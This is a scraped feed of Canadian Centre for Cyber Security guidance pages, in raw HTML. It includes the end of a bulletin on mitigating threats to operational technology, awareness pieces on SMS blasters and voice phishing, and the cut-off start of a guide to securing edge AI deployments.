Windows 11 can automatically lock out accounts for 10 minutes after 10 incorrect logins in a 10-minute period.</li> </ul><p><strong>Log collection (CRG 2.15)</strong></p> <ul><li>Collect and store logs for use in both detection and incident response activities (e.g., forensics), including the following logs: <ul><li>access- and security-focused (e.g., intrusion detection systems / intrusion prevention systems (IDS/IDPS)</li> <li>firewalls</li> <li>data loss prevention (DLP)</li> <li>virtual private networks (VPN)</li> </ul></li> <li>Security teams are notified when a critical log source is disabled, such as Windows event logging.</li> <li>For <abbr title="operational technology">OT</abbr> assets where logs are non-standard or not available, collect network traffic and communications between those assets and other assets.</li> </ul><h3>Conduct risk assessments</h3> <p><strong>Detect relevant threat and <abbr title="tactics, techniques, and procedures">TTPs</abbr> (CRG 3.0)</strong></p> <ul><li>Document a list of threats and cyber threat actor <abbr title="tactics, techniques, and procedures">TTPs</abbr> relevant to the organization (for example, based on industry, sectors, etc.) and ensure the ability to detect instances of those key threats (for example, through rules, alerting, or commercial prevention and detection systems).</li> </ul><p>Organizations should conduct self-assessments using the <abbr title="Cyber Security Readiness Goals">CRGs</abbr> toolkit to identify gaps and track progress.</p> <h3>Develop incident response plans</h3> <p><strong>Incident response plan (CRG 1.3)</strong></p> <ul><li>Develop, maintain, update, and regularly drill <abbr title="operational technology">OT</abbr> cyber security incident response plans for both common and organization-specific threat scenarios (for example, by sector or locality) and <abbr title="tactics, techniques, and procedures">TTPs</abbr>.</li> <li>Consider engaging with appropriate stakeholders to conduct tabletop exercises focused on emerging threats such as artificial intelligence-enhanced attacks.</li> </ul><p><strong>Incident planning and preparedness (CRG 5.0)</strong></p> <ul><li>Develop, maintain, and execute plans to recover and restore to service business or mission-critical assets or systems that might be impacted by a cyber security incident.</li> <li>If a cyber incident does occur, perform a hotwash post-recovery to determine lessons learned and prevent future incidents. Integrate any lessons learned into improvements in governance processes and/or the incident response plan.</li> </ul><h3>Train staff and vendors</h3> <p><strong>Basic and <abbr title="operational technology">OT</abbr> cyber security training (CRG 2.8)</strong></p> <ul><li>Provide training that covers basic cyber security and privacy concepts, such as phishing, business email compromise, basic operational security, password security, privacy breaches, etc., and foster an internal culture of security and cyber awareness.</li> <li>Ensure that personnel who maintain or secure <abbr title="operational technology">OT</abbr> as part of their regular duties receive <abbr title="operational technology">OT</abbr>-specific cyber security training at least annually.</li> </ul><h3>Maintain backups</h3> <p><strong>System backups and redundancy (CRG 2.14)</strong></p> <ul><li>Regularly back up all systems that are necessary for operations. Determine on a case-by-case basis what systems to back up and the exact frequency since every system will have different backup and recovery requirements.</li> <li>Store backups separately from the source systems and test on a recurring basis, no less than once per year, to ensure they are usable.</li> <li>Ensure stored information for <abbr title="operational technology">OT</abbr> assets includes at a minimum: <ul><li>Configurations</li> <li>Roles</li> <li>Programmable controller (PLC) logic</li> <li>Engineering drawings</li> <li>Tools</li> </ul></li> </ul><p>These mitigations can help critical infrastructure organizations prevent non-state cyber threat actors from exploiting vulnerable systems. We encourage organizations facing a suspected cyber incident to engage with the Cyber Centre for mitigation and recovery assistance.</p> <h2>Resources</h2> <ul><li><a href="/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a></li> <li><a href="/en/guidance/cyber-threat-bulletin-cyber-threat-operational-technology">Cyber Threat Bulletin: Cyber Threats to Operational Technology</a></li> <li><a href="https://www.cisa.gov/news-events/alerts/2025/05/06/unsophisticated-cyber-actors-targeting-operational-technology">Cybersecurity &amp; Infrastructure Security Agency. Unsophisticated Cyber Actor(s) Targeting Operational Technology</a></li> <li><a href="https://www.justice.gov/opa/pr/justice-department-announces-actions-combat-two-russian-state-sponsored-cyber-criminal">U.S. Department of Justice. Justice Department Announces Actions to Combat Two Russian State-Sponsored Cyber Criminal Hacking Groups</a></li> <li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">U.S. Cybersecurity &amp; Infrastructure Security Agency. Known Exploited Vulnerabilities Catalog</a></li> </ul><hr /><h2>About this document</h2> <p>This cyber bulletin aims to raise awareness among both information technology (IT) and operational technology (OT) system owners and operators and urges all Canadians to be vigilant of this threat. It builds on a Cyber Centre alert issued on October 29, 2025 on <a href="/en/alerts-advisories/al25-016-internet-accessible-industrial-control-systems-ics-abused-hacktivists">Internet-accessible industrial control systems (ICS) being abused by hacktivists</a>, and a <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-343a">joint cyber security advisory on pro-Russia hacktivism</a> authored by the Cyber Centre and international partners in December 2025, to provide additional threat context and mitigation advice.</p> <p>For follow-up questions or issues, contact the Cyber Centre at <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</p> <h3>Assessment base and methodology</h3> <p>The judgements in this bulletin rely on reporting from multiple sources, both classified and unclassified. They are based on the Cyber Centre’s knowledge and expertise in cyber security. Defending the Government of Canada’s information systems provides the Cyber Centre with a unique perspective to observe trends in the cyber threat environment, which also informs our assessments. The Communications Security Establishment Canada’s (CSE) foreign intelligence mandate provides us with valuable insight into adversary behaviour in cyberspace. While we must always protect classified sources and methods, we provide the reader with as much justification as possible for our judgements.</p> <p>Our judgements are based on an analytical process that includes evaluating the quality of available information, exploring alternative explanations, mitigating biases and using probabilistic language. We use terms such as "we assess" or "we judge" to convey an analytic assessment. We use qualifiers such as "possibly", "likely" and "very likely" to convey probability.</p> <p>The assessments and analysis are based on information available as of <strong>January 23, 2026.</strong></p> <div class="panel panel-default col-md-12"> <div class="panel-body"> <figure><figcaption class="mrgn-bttm-md"><h3>Estimative language guide</h3> </figcaption></figure><p class="mrgn-bttm-lg">The chart below matches estimative language with appropriate percentages. These percentages are not derived via statistical analysis, but are based on logic, available information, prior judgements and methods that increase the accuracy of estimates.</p> <img alt="Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/tarp-language-chart-transparent-e.png" /><details class="brdr-tp brdr-rght brdr-bttm brdr-lft mrgn-bttm-sm"><summary>Long description – Estimative language chart </summary><ul class="list-unstyled mrgn-tp-md"><li>1 to 9% Almost no chance</li> <li>10 to 24% Very unlikely/very improbable</li> <li>25 to 39% Unlikely/improbable</li> <li>40 to 59% Roughly even chance</li> <li>60 to 74% Likely/probably</li> <li>75 to 89% Very likely/very probable</li> <li>90 to 99% Almost certainly</li> </ul></details></div> </div> </div> </div> </div> </div> </div> </article>

  • Joint guidance on minimum elements for a software bill of materials
    by Canadian Centre for Cyber Security on July 29, 2026 at 3:26 pm

    This publication updates and replaces the 2021 Minimum Elements for a Software Bill of Materials published by the United States’ National Telecommunications and Information Administration.

  • Joint guidance on isolating vital systems
    by Canadian Centre for Cyber Security on July 28, 2026 at 6:01 pm

    This joint guidance is intended to support senior decision-makers within CI organizations.

  • Protect your devices from SMS blasters (ITSAP.00.104)
    by Canadian Centre for Cyber Security on July 27, 2026 at 12:40 pm

    <article data-history-node-id="7625" about="/en/guidance/protect-your-devices-sms-blasters-itsap00104" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>July 2026</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.00.104</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>July 2026 | Awareness series</strong></p> </div> <!–pdf download–> <div class="col-md-12 mrgn-tp-lg"><!–<div class="mrgn-bttm-md well well-sm col-md-4 pull-right mrgn-lft-md col-sm-12 col-xs-12"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/itsap00104-e.pdf">Protect your devices from <abbr title="short message service">SMS</abbr> blasters &nbsp;- ITSAP.00.104 (PDF,&nbsp;#&nbsp;KB)</a></p> </div>–> <p>Text messages (<abbr title="short message service">SMS</abbr>) have become one of the most common ways for threat actors to try and scam victims. <abbr title="short message service">SMS</abbr> blasters are a type of cell site simulator, which are portable devices that impersonate legitimate mobile networks to trick nearby devices to connect to them. Threat actors use <abbr title="short message service">SMS</abbr> blasters to carry out <abbr title="short message service">SMS</abbr> phishing attacks (known as smishing) and other malicious activities designed to steal sensitive or financial information or spread disinformation. This publication offers information on the threats posed by <abbr title="short message service">SMS</abbr> blasters and how to best protect yourself.</p> <section><h2 class="h3">On this page</h2> <ul><li><a href="#1">How <abbr title="short message service">SMS</abbr> blasters work</a></li> <li><a href="#2">Threats posed by <abbr title="short message service">SMS</abbr> blasters</a></li> <li><a href="#3">How to protect against <abbr title="short message service">SMS</abbr> blasters</a></li> <li><a href="#4">Learn more</a></li> </ul></section></div> </div> <h2 id="1">How <abbr title="short message service">SMS</abbr> blasters work</h2> <p><abbr title="short message service">SMS</abbr> blasters can impersonate cellular towers to take advantage of inherent or unpatched vulnerabilities found in older second generation (2G) network standards that are still supported by modern devices. 2G network standards do not enforce authentication or encryption between the mobile device and the network.</p> <p><abbr title="short message service">SMS</abbr> blasters can broadcast higher power network signals to trick nearby devices into connecting by broadcasting a stronger signal than the current connection. After the connection has been established, the <abbr title="short message service">SMS</abbr> blaster will attempt to downgrade the device to 2G mode. This allows threat actors to send an <abbr title="short message service">SMS</abbr> and bypass the protections and filters implemented by mobile network operators (MNOs) to protect their customers.</p> <h2 id="2">Threats posed by <abbr title="short message service">SMS</abbr> blasters</h2> <p><abbr title="short message service">SMS</abbr> blasters pose many threats to devices within range of a compromised device. These threats include:</p> <h3>Smishing and fraud</h3> <p>Smishing is a scam in which threat actors send fraudulent messages that look legitimate to trick victims into clicking links and attachments or sharing sensitive information. <abbr title="short message service">SMS</abbr> blasters allow threat actors to quickly send thousands of smishing messages to mobile devices within the coverage area of the device. The messages can be generic or tailored for a specific scenario, such as sporting events or conferences, or can be a notification to validate an action or your identity, such as bank authentication <abbr title="personal identification number">PIN</abbr>s.</p> <p>Threat actors can also use this opportunity to send messages using spoofed short codes commonly used by organizations to send users notifications. This can make their malicious messages even more difficult to detect as fraudulent, since they appear to come from a common number you have received alerts from before.</p> <p>Smishing scams can lead to fraud with compromised credentials, unauthorized transactions and identity theft. For more details on smishing, see the Cyber Centre’s <a href="https://www.cyber.gc.ca/en/guidance/smishing-protect-yourself-sms-attacks-itsap00103">Smishing: Protect yourself from <abbr title="short message service">SMS</abbr> attacks (ITSAP.00.103)</a>.</p> <h3>Misinformation, disinformation and malinformation</h3> <p>By using blasters to conduct smishing and fraud, threat actors can spread misinformation, disinformation and malinformation (MDM). The threat can target all devices within the coverage area of the <abbr title="short message service">SMS</abbr> blaster and spread <abbr title="misinformation, disinformation and malinformation">MDM</abbr> concerning a specific source or event. Spreading <abbr title="misinformation, disinformation and malinformation">MDM</abbr> in this context is a serious concern. It can cause harm by manipulating individuals and organizations into thinking there is a conflict or urgency.</p> <h3>Service disruption</h3> <p><abbr title="short message service">SMS</abbr> blasters can cause dropped calls, slow data speeds and strain mobile infrastructure by downgrading connected devices to the 2G network. This can affect emergency calls and connection to Internet of Things (IoT) devices.</p> <h3>Privacy and data loss</h3> <p><abbr title="short message service">SMS</abbr> blasters can collect sensitive data that includes identifiable information, such as:</p> <ul><li>unique subscriber identification (international mobile subscriber identity (IMSI))</li> <li>unique device identification (international mobile equipment identity (IMEI))</li> <li>user locations</li> </ul><p>Threat actors can further use this information as entry points for more advanced cyber campaigns.</p> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 id="3">How to protect against <abbr title="short message service">SMS</abbr> blasters</h2> <p><abbr title="mobile network operators">MNOs</abbr>, device manufacturers and end users should consider the following mitigation strategies to protect mobile devices from <abbr title="short message service">SMS</abbr> blasters.</p> <h3>Mitigation strategies for mobile network operators</h3> <ul><li><strong>Detect and respond quickly:</strong> <ul><li>Use tools that can spot fake cellular towers and monitor network logs for unusual activities, such as unknown neighbour cell towers, sudden handover failures and rapid disconnections and reconnections</li> <li>Implement security tools to monitor the signaling layer to identify sudden spikes in signaling volume or abnormal registration patterns that indicate a rogue base station is active</li> <li>Use analytics with spam reporting to catch abnormal <abbr title="short message service">SMS</abbr> patterns or suspicious device identification</li> </ul></li> <li><strong>Block insecure connections:</strong> Configure your network to prevent devices from being redirected to older insecure 2G connections</li> <li><strong>Share intelligence:</strong> Feed real-time network data into fraud management systems, update blocklists or malicious Uniform Resource Locators (URLs) and share threat information with other operators and government authorities</li> <li><strong>Coordinate across the industry:</strong> Collaborate with device makers and regulators to improve privacy features and strengthen defence mechanisms</li> </ul><h3>Mitigation strategies for device manufacturers</h3> <ul><li><strong>Offer users more security control:</strong> <ul><li>Provide options for users to disable 2G network connections</li> <li>Enforce the use of encryption with the mobile network</li> </ul></li> <li><strong>Improve security features:</strong> <ul><li>Offer clearly defined options for how users can select and restrict network connections</li> <li>Alert users when messages come from unauthenticated connections</li> <li>Disable 2G network usage by default</li> </ul></li> </ul><h3>Mitigation strategies for end users</h3> <ul><li><strong>Use phishing-resistant multi-factor authentication (MFA):</strong> Use passkeys or hardware security keys rather than <abbr title="short message service">SMS</abbr>-based codes and one-time passwords</li> <li><strong>Stop, verify and report:</strong> <ul><li><strong>Stop:</strong> Do not click on links or attachments in unsolicited <abbr title="short message service">SMS</abbr> and do not respond to suspicious or unexpected messages</li> <li><strong>Verify:</strong> Contact the organization or individual directly through their official channels, such as the contact information listed on their official website</li> <li><strong>Report:</strong> <ul><li>Forward the suspicious message to 7-7-2-6 (“SPAM”) or use the messaging application’s spam reporting function</li> <li>Report the incident to the Royal Canadian Mounted Police via the <a href="https://reportcyberandfraud.canada.ca/">Report cybercrime and fraud portal</a>. This will notify the appropriate organizations to initiate an investigation and take appropriate actions</li> </ul></li> </ul></li> <li><strong>Disable 2G:</strong> <ul><li>Turn off 2G network connections in your phone’s settings, if the option is available</li> <li>Contact your mobile provider if you don’t have the option to disable specific network connections</li> </ul></li> <li><strong>Use end-to-end encryption applications:</strong> Protect the contents within messaging and data transfer communications with applications that support end-to-end encryption</li> <li><strong>Be skeptical:</strong> Remember that legitimate organizations never ask for personal information, passwords or banking information through text messages</li> <li><strong>Install applications safely:</strong> <ul><li>Only download applications from official app stores or from developers with a verified reputation</li> <li>Use an anti-virus software to scan newly downloaded and existing apps on your device for malware</li> </ul></li> </ul><p>As <abbr title="short message service">SMS</abbr>-based authentication and notifications continue to be the default for many applications, threat actors will continue to exploit their vulnerable nature. To address these challenges, collaboration among the telecommunications industry is essential for raising awareness and implementing robust security measures.</p> <h2 id="4">Learn more</h2> <ul class="lst-spcd"><li><a href="/en/guidance/using-your-mobile-device-securely-itsap00001">Using your mobile device securely (ITSAP.00.001)</a></li> <li><a href="/en/guidance/dont-take-bait-recognize-and-avoid-phishing-attacks">Don’t take the bait: Recognize and avoid phishing attacks – ITSAP.00.101</a></li> <li><a href="/en/guidance/how-identify-misinformation-disinformation-and-malinformation-itsap00300">How to identify misinformation, disinformation, and malinformation (ITSAP.00.300)</a></li> <li><a href="/en/guidance/steps-effectively-deploying-multi-factor-authentication-mfa-itsap00105">Steps for effectively deploying multi-factor authentication (MFA) – ITSAP.00.105)</a></li> <li><a href="https://www.getcybersafe.gc.ca/en/blogs/reporting-spam-text-messages-7726">Reporting spam text messages to 7726</a></li> </ul></div> </div> </div> </div> </div> </article>

  • Joint cyber security advisory on Russian state-sponsored phishing campaign targeting Zimbra webmail
    by Canadian Centre for Cyber Security on July 23, 2026 at 6:01 pm

    The joint advisory warns that Russia-sponsored threat actors associated with an advanced persistent threat group, known as Laundry Bear, are exploiting a known vulnerability in Zimbra webmail.

  • What is voice phishing (vishing)? – ITSAP.00.102
    by Canadian Centre for Cyber Security on July 21, 2026 at 12:41 pm

    <article data-history-node-id="3396" about="/en/what-voice-phishing-vishing-itsap00102" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><!–ENGLISH Intro paragraph plus pdf download–> <div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>July 2026</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.00.102</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>July 2026 | Awareness series</strong></p> </div> </div> <section><p>Vishing is a type of social engineering technique that leverages voice communication technology. In a vishing attack, threat actors or “vishers” use fraudulent phone numbers, voice altering software and other social engineering tactics to entice people to share personal and sensitive information over the phone. Advanced vishing attacks exploit Voice over Internet Protocol (VoIP) technology to create fake phone numbers and spoof the caller ID so that the call appears to be from legitimate companies or institutions. <abbr title="Voice over Internet Protocol">VoIP</abbr> makes it easy for vishers to automate hundreds of scam calls over the internet and these numbers are hard to trace.</p> </section><section><h2 class="h3">On this page</h2> <ul><li><a href="#1">How vishing scams work</a></li> <li><a href="#2">Examples of vishing scams</a></li> <li><a href="#3">Tips for spotting and avoiding vishing scams</a></li> <li><a href="#4">How to recover from a vishing scam</a></li> <li><a href="#5">Learn more</a></li> </ul></section><div class="well well-lg mrgn-tp-lg"> <div class="row"> <h2 class="page-header mrgn-tp-0 mrgn-lft-md" id="1">How vishing scams work</h2> <p class="mrgn-lft-md">Vishing scams typically follow a predictable pattern. Attackers gather information, prepare a convincing impersonation and then contact the victim. Each stage is designed to make the call appear legitimate and to pressure the victim into acting quickly. Understanding these steps can help reduce the risk of being targeted.</p> <h3 class="mrgn-tp-xl mrgn-bttm-md">Step 1: Information gathering</h3> <p class="mrgn-lft-md">Vishers start by collecting phone numbers and background information. They often use a combination of automated tools and publicly available data. This information can support large-scale scam campaigns or more targeted attacks. In targeted vishing attempts, threat actors look for personal, work-related or role-specific details to make the call interaction more believable.</p> <p class="mrgn-lft-md">Common data collection methods include the following:</p> <ul><li><strong>Dumpster diving</strong> involves retrieving discarded documents or lists of phone numbers that were not securely destroyed</li> <li><strong>War dialing</strong> uses automated systems to call a range of phone numbers within a specific area code to identify active lines</li> <li><strong>Internet searches</strong> gather information from publicly available online sources, such as social media, video platforms, professional networking sites and organizational websites</li> <li><strong>Data breaches</strong> expose phone numbers, contact lists and personal or organizational information that may later be sold or shared among scammers</li> </ul></div> <div class="row"> <h3 class="mrgn-tp-lg mrgn-bttm-md">Step 2: Impersonation and voice manipulation</h3> <p class="mrgn-lft-md">Once enough information is collected, vishers prepare to impersonate a trusted source. This may involve posing as a coworker, supervisor, executive, service provider or government representative.</p> <p class="mrgn-lft-md">Threat actors often adjust their tone to match the situation to lower suspicion and encourage cooperation. They may sound:</p> <ul><li>calm and professional</li> <li>urgent and authoritative</li> <li>helpful and reassuring</li> </ul><p class="mrgn-lft-md mrgn-bttm-md">Threat actors use artificial intelligence (AI) technology and short audio samples to create a simulation of a person’s voice. This technique, also known as voice cloning, allows threat actors to impersonate people the victim knows or trusts to appear more legitimate.</p> </div> <div class="row"> <h3 class="mrgn-tp-lg mrgn-bttm-md">Step 3: Making the fraudulent call</h3> <p class="mrgn-lft-md">Once vishers have manipulated a voice, they will place phone calls in a way that makes them appear legitimate and routine. The conversation is designed to move quickly and limit opportunities for verification.</p> <p class="mrgn-lft-md">Threat actors plan and execute the call in a deliberate way, using a combination of technical tricks and social pressure to steer the conversation toward a specific outcome. As part of this approach, they may:</p> <ul><li>spoof caller ID information so the call appears to come from a trusted phone number, internal extension, or voicemail system</li> <li>select targets broadly or based on role and access, such as individuals who can approve payments or share sensitive information</li> <li>rely on prepared scripts to guide the conversation and lead the victim toward a specific action</li> <li>introduce urgency by claiming there is an immediate issue, such as a security problem, a payment concern, or a time sensitive request from leadership</li> </ul><p class="mrgn-lft-md mrgn-bttm-md">This combination of legitimacy and urgency increases the likelihood that the victim will act before stopping to verify the request.</p> </div> </div> <div class="panel panel-default mrgn-tp-lg"> <div class="panel-body"> <div class="row"> <div class="col-md-12"> <h2 class="mrgn-tp-sm">Scammers are after your:<br /> identity, passwords and money</h2> </div> </div> <div class="row"> <div class="col-md-12"> <p>Vishing can be part of a larger phishing attack, another social engineering technique, to steal money or data from individuals or organizations.</p> <p>To learn more about phishing, refer to <a href="/en/guidance/dont-take-bait-recognize-and-avoid-phishing-attacks">Don’t take the bait: Recognize and avoid phishing attacks – ITSAP.00.101</a> on our website.</p> </div> </div> </div> </div> <h2 class="mrgn-tp-md" id="2">Examples of vishing scams</h2> <p>Vishing aims to convince the victim to disclose confidential information, such as a personal identification number (PIN), Social Insurance Number (SIN), credit card information, or account passwords. This information can be used for identity fraud, to conduct unauthorized financial transactions, or to gain access to corporate or personal accounts. The list below provides some examples of common vishing scams:</p> <ul class="list-unstyled"><li><strong>Credential vishing</strong> <ul class="lst-none"><li>Vishers use this method to gain access to banking and credit card information. They will use these compromised credentials to login into your account, access funds, or make unauthorized purchases.</li> </ul></li> <li><strong>Government impersonation</strong> <ul class="lst-none"><li>Vishers pose as government employees, most frequently from departments dealing with taxes and personal finance. They will use scare tactics to convince you to pay for items like overdue or unpaid taxes or face legal consequences.</li> <li>Vishers also pose as members of law enforcement organizations and request your personal information which they can use for identity fraud.</li> </ul></li> <li><strong>Corporate extortions</strong> <ul class="lst-none"><li>Posing as the boss or company CEO, vishers will convince you to comply with your boss’ request (e.g., releasing funds, authorizing approvals for access to sensitive systems).</li> </ul></li> <li><strong>Telemarketing scams</strong> <ul class="lst-none"><li>Posing as a telemarketer or representative of a company, vishers will congratulate you on winning a contest and then ask for you to pay a redemption fee or provide your credit card information to reserve your prize.</li> </ul></li> <li><strong>Technical support scams</strong> <ul class="lst-none"><li>Posing as technical support employees for various organizations, vishers will often ask for personal or employment information to verify your identity. Vishers may even ask for your permission to access your device remotely to help install software. While doing so, they can download malicious software on your device that can trigger pop-up warnings that encourage you to call a number to fix a technical or security issue.</li> </ul></li> </ul><hr /><h2 class="mrgn-tp-md" id="3">Tips for spotting and avoiding vishing scams</h2> <p>The following tips outline practical steps you can take when handling suspicious phone calls.</p> <ul><li><strong>Be suspicious of callers asking for sensitive information.</strong> Do not share personal or organizational information such as usernames, passwords, one-time codes or banking details over the phone, unless you are certain it is a legitimate institution.</li> <li><strong>Hang up and call back using a known, trusted number.</strong> If a caller claims to be from a bank, vendor, IT support or government agency, end the call and contact the organization using a publicly listed phone number or official website. Do not use numbers provided by the caller or your phone’s callback option.</li> <li><strong>Use verification methods like safe words or call-back codes.</strong> For workplace or families, establish a shared word, code or call-back procedure to confirm someone’s identity before discussing sensitive matters. If the caller cannot pass the verification, assume the call is not legitimate.</li> <li><strong>Be wary of calls from unknown numbers or automated calls.</strong> Let the call go to voicemail if you do not recognize the number. Avoid using your phone’s callback function or phone numbers provided by the caller. Communicate with the site or service through a trusted contact method.</li> <li><strong>Watch for urgency or scare tactics.</strong> Vishers try to catch you off guard and make you feel you have no other options but to provide the requested information. Some may use threatening language to get you to act quickly. For example, they may say you must provide your information to avoid having your account deactivated.</li> <li><strong>Be cautious of poor audio quality or unnatural speech patterns.</strong> Calls with unusual delays, robotic voices or distorted audio may be scams. Hang up and wait to see if the caller calls back and leaves a voicemail, then verify independently.</li> <li><strong>Train staff and set clear phone-based verification processes.</strong> Educate employees on vishing tactics and how to respond. Put simple procedures in place for reporting suspicious calls and for verifying internal or partner requests made over the phone.</li> <li><strong>Use built-in phone protections.</strong> Most smartphones have spam-call filtering and call-blocking features. Enable these settings and report suspected scam calls to your phone provider when possible.</li> </ul><div class="clearfix"> </div> <div class="panel-body bg-info mrgn-tp-sm mrgn-bttm-lg"> <div class="row"> <div class="col-md-12"> <h2 class="mrgn-tp-0">STIR/SHAKEN</h2> <p>STIR stands for <strong>Secure Telephone Identity Revisited.</strong> SHAKEN stands for <strong>Signature-based Handling of Asserted Information using toKENs.</strong> As of November 30, 2021, the Canadian Radio-television and Telecommunications Commission (CRTC) required all telecommunications providers in Canada to implement this new technology to authenticate and validate <abbr title="Voice over Internet Protocol">VoIP</abbr> voice calls.</p> </div> </div> <div class="row"> <div class="col-md-12"> <h3 class="mrgn-tp-md">What does this mean?</h3> <p>Once your phone company implements STIR/SHAKEN they will be able to determine if a call is from a legitimate source and better inform customers of spam calls. This will enable you to make an informed decision about whether to respond to the unknown caller. As more phone companies implement STIR/SHAKEN, there should be a reduction in the volume of spam calls made over <abbr title="Voice over Internet Protocol">VoIP</abbr>.</p> </div> </div> </div> <h2 class="mrgn-tp-md" id="4">How to recover from a vishing scam</h2> <p>Vishing scams are designed to sound urgent and believable. Anyone can be affected, even people who are cautious and experienced. Acting quickly can help limit harm and protect your information.</p> <ul><li>Notify all your financial institutions related to the compromised accounts. Ask if the fraudulent transactions can be cancelled and block future charges.</li> <li>Change your passwords immediately for all affected accounts as well as other accounts that used the same compromised passwords.</li> <li>Monitor your financial accounts. Consider signing up with a credit monitoring service to alert you of potential fraudulent activity, especially if you have concerns that you’ve been a victim of identity theft.</li> <li><a href="https://antifraudcentre-centreantifraude.ca/">Report the scam to the Canadian Anti-Fraud Centre (CAFC)</a>. Document the phone number of the scammer as well as any websites you were asked to visit and provide this info to CAFC.</li> <li>Report the incident to your organization’s IT administrator if you think you might have revealed sensitive corporate information. Follow your organization’s protocol for reporting cyber incidents.</li> </ul><h2 class="mrgn-tp-md" id="5">Learn more</h2> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/social-engineering-itsap00166">Social engineering (ITSAP.00.166)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/protecting-yourself-identity-theft-online-itsap00033">Protecting yourself from identity theft online (ITSAP.00.033)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/generative-artificial-intelligence-ai-itsap00041">Generative artificial intelligence (ITSAP.00.041)</a></li> </ul></div> </div> </div> </div> </div> </article>

  • Social engineering – ITSAP.00.166
    by Canadian Centre for Cyber Security on July 20, 2026 at 6:49 pm

    Social engineering attacks occur when a threat actor uses social connection and manipulation to pressure users into providing sensitive details.

  • Securely deploying AI at the network edge – ITSP.80.101
    by Canadian Centre for Cyber Security on July 15, 2026 at 6:56 pm

    <article data-history-node-id="7979" about="/en/guidance/securely-deploying-ai-network-edge-itsp80101" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 col-sm-12 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>July 2026</strong></p> </div> <div class="col-md-4 col-sm-12 hidden-xs hidden-sm"> <p class="text-center"><strong>Practitioner series</strong></p> </div> <div class="col-md-4 col-sm-12 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSP.80.101</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>July 2026 | Practitioner series</strong></p> </div> </div> <div class="clearfix"> </div> <section><p>This publication sets out practical cyber security priorities for organizations that develop, deploy or operate artificial intelligence (AI) systems at the network edge. It is intended for practitioners, such as information technology (IT) and operational technology (OT) security managers, administrators and analysts, who are responsible for securing edge <abbr title="artificial intelligence">AI</abbr> deployments. Appendix A introduces core edge <abbr title="artificial intelligence">AI</abbr> categories and Appendix B provides representative use cases across sectors.</p> <p>This publication is designed to complement and extend the Canadian Centre for Cyber Security’s (Cyber Centre) foundational <abbr title="artificial intelligence">AI</abbr> security guidance <a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">Top 10 artificial intelligence security actions: A primer (ITSAP.10.049),</a> which addresses <abbr title="artificial intelligence">AI</abbr> security for general organizational contexts. This publication is organized into the same three security pillars that underpin <a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">ITSAP.10.049</a>:</p> <ul><li><strong>Pillar 1: </strong>Protecting against adversarial use of <abbr title="artificial intelligence">AI</abbr></li> <li><strong>Pillar 2: </strong>Protecting <abbr title="artificial intelligence">AI</abbr> systems</li> <li><strong>Pillar 3: </strong>Protecting users and business processes</li> </ul><p>We expect these pillars to remain foundational as <abbr title="artificial intelligence">AI</abbr> technologies and threats evolve. Rather than referencing specific action numbers from <a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">ITSAP.10.049</a>, which may periodically be revised, this publication aligns conceptually with those pillars, pointing readers to the relevant thematic areas where appropriate.</p> </section><section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#1">Edge <abbr title="artificial intelligence">AI</abbr></a></li> <li><a href="#2">Cyber security guidelines for edge <abbr title="artificial intelligence">AI</abbr></a> <ul><li><a 